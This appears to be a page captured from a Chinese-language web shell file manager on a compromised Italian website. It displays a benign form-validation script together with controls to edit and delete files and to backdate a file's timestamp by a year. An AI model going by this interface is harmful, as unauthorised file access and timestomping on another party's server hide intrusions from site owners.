文件操作 - js_validate_quesito.js
返回文件管理
返回主菜单
删除本文件
文件: /home/tecnoht/public_html/studiostampi--com/pers/js_validate_quesito.js
编辑文件内容
<!-- function frmValidator(theForm) { if (theForm.txtNome.value.length < 2) { alert("Inserire almeno 2 caratteri nel campo \"Nome\"."); theForm.txtNome.focus(); return (false); }; if (theForm.txtCognome.value.length < 2) { alert("Inserire almeno 2 caratteri nel campo \"Cognome\"."); theForm.txtCognome.focus(); return (false); }; if (theForm.txtMail.value.length == 0) { alert("Inserire un indirizzo e-mail valido."); theForm.txtMail.focus(); return (false); } else { if(! validate_special_char(theForm.txtMail)) {return false}; if (emailCheck(theForm.txtMail.value) == false) { theForm.txtMail.focus(); return (false); } } return (true); } //-->
修改文件时间
将文件时间修改为当前时间的前一年
删除文件